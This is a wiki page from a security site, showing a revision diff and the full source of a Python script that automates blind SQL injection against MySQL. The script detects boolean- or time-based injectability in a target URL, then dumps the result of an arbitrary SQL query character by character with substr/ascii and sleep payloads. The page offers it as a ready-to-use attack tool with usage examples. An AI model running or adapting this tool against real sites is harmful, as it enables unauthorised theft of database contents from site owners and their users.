Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "SQL injection/mysqli-blindutils/sqli-slee.py"

From NetSec
Jump to: navigation, search
(Created page with "{{info|<center>This script uses time and boolian based blind SQL injection to obtain the desired information from MySQL database.</center>}} =Info= The syntax of this script...")
 
(Source)
Line 118: Line 118:
 
if(sqlitype=='boolian'):
 
if(sqlitype=='boolian'):
 
letter=value(URL+'%20and%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))')
 
letter=value(URL+'%20and%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))')
if(letter=='done'):
 
break
 
 
   elif(sqlitype=='time'):
 
   elif(sqlitype=='time'):
 
     letter=value(URL+'%20and%20sleep((select%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))')
 
     letter=value(URL+'%20and%20sleep((select%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))')
if(letter=='done'):
+
if(letter=='done'):
break
+
break
 
     dump=dump+letter
 
     dump=dump+letter
 
   position+=1
 
   position+=1

Revision as of 20:53, 21 September 2012

c3el4.png
This script uses time and boolian based blind SQL injection to obtain the desired information from MySQL database.

Info

The syntax of this script is:

 python bsqli.py -u [url] -i [injection]

Example

 python bsqli.py -u "http://target.com/?id=1%27" -i "select database()"

Disclaimer

RPU0j.png The end-user is liable for his-or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act.

Source

 
#!/usr/bin/python
 
import sys,re,urllib,urllib2,string,time
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
 
def request(URL):
 	useragent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
 	req = urllib2.Request(URL, None, useragent)
 	try:
   		request=urllib2.urlopen(req)
 	except HTTPError,  e:
   		print('[!] The server couldnt fulfill the request.')
   		print('[!] Error code: '+str(e.code))
   		sys.exit(1)
 	except URLError,  e:
   		print('[!] We failed to reach a server.')
   		print('[!] Reason: '+str(e.reason))
   		sys.exit(1)
 	return len(request.read())
 
def value(URL):
 	target=0
	end=0
	nextmaybe=0
 	floor=0
 	ceiling=255
 	maybe = int(ceiling)/2
 	while(1):
		end+=1
		if(end==9):
			return 'done'
  		if iswhat(URL, maybe, '>'):	
    			floor = maybe
    			nextmaybe = int(maybe + ((ceiling - floor)/2))
  		elif iswhat(URL, maybe, '<'):
    			ceiling = maybe
    			nextmaybe = int(maybe - ((ceiling - floor)/2))
  		elif iswhat(URL, maybe, '='):
    			return chr(maybe)
  		maybe = nextmaybe
 
def iswhat(URL,maybe,op):
 	if(sqlitype=='boolian'):
   		ValueResponse=int(request(str(URL)+str(op)+str(maybe)+'--+'))
   		if(TrueResponse==ValueResponse):
     			return 1
   		else:
     			return 0
 	elif(sqlitype=='time'):
		start = time.time()
   		ValueResonse=request(str(URL)+str(op)+str(maybe)+')*2)--+')
   		elapsedtime = (time.time() - start)
   		if (elapsedtime > 2):
     			return 1
   		else:
     			return 0
 
def vulncheck(URL):
 	print('[+] Checking site...')
 	global TrueResponse
 	TrueResponse=int(request(URL+'%20AND%2043%20like%2043--+'))
 	FalseResponse=int(request(URL+'%20AND%2034%20like%2043--+'))
 	if(TrueResponse!=FalseResponse):
   		print('[+] Site seems to be vulnerable to boolian based blind SQL injection.')
   		return 'boolian'
 	else:
   		start = time.time()
   		SleepResponse=request(URL+'%20and%20sleep(5)--+')
   		elapsedtime = (time.time() - start)
   		if (elapsedtime > 5):
     			print('[+] Site seems to be vulnerable to time based blind SQL injection.') 
     			return 'time'
   		else:
     			print('[!] Seems like site isnt vulnerable to blind SQL injection.')
     			sys.exit(1)
 
def main():
	print('''
	Auto BSQLi tool for MySQL
	      ''')
 
	usage = 'usage: %prog -u <target> -i <injection>'
	parser = OptionParser(usage=usage)
	parser.add_option("-u", action="store", type="string", dest="URL",
	help='"http://site.tld/index.php?id=1%27"')
	parser.add_option('-i', action='store', type='string', dest='INJECTION',
	help='"select version()"')
 
	(options, args) = parser.parse_args()
	if options.URL and options.INJECTION:
   		URL=options.URL
   		INJECTION=urllib2.quote(options.INJECTION.encode("utf8"))
	else:
   		print('[!] Missing url or injection parameter.')
   		print('[!] Use --help.')
   		sys.exit(1)
 
	global sqlitype
	sqlitype=vulncheck(URL)
	position=1
	dump=''
	print('[+] Dumping data...')
	while(1):
		if(sqlitype=='boolian'):
			letter=value(URL+'%20and%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))')
   		elif(sqlitype=='time'):
     			letter=value(URL+'%20and%20sleep((select%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))')
		if(letter=='done'):
			break
     		dump=dump+letter
   		position+=1
	if(dump):
		print('[+] Data: '+dump)
	else:
		print('[!] No data dumped. Check your injection.')
 
if __name__ == "__main__":
    main()